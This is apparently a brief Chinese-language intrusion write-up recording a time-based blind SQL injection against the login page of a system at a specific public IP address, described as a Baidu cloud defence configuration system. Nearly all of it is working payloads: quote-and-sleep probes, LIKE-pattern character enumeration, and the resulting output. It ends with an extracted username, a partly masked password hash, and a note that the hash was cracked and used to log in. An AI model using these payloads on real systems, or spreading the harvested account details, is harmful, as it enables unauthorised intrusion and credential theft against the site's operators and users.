http://103.235.46.165 百度云主防配置系统
http://103.235.46.165/index.php/Manage/login
post:username=test&password=test
{"status":0,"info":"用户密码不正确","data":false}
http://103.235.46.165/index.php/Manage/login
post:username=test'&password=test
{"status":0,"info":"用户名不存在","data":false}
登录点是 无论用户名密码对错都是用户密码不正确 但是' 出现用户名不存在
post:username=test' or sleep(1)#&password=test 延迟10秒 里面有8个用户好像
登录处 那就直接查同表信息 登录即可
username=test' or username like '%' and sleep(1)#&password=test
延时 字段username 同理password也存在
先读个用户名出来
username=test' or username like 't%' and sleep(1)#&password=test
延迟了 依次注出用户 tanguangxi
username=tanguangxi' and password like '3%' and sleep(5)#&password=test
依次注出password
31c724c7395d4367dfa6d4**********
解出登录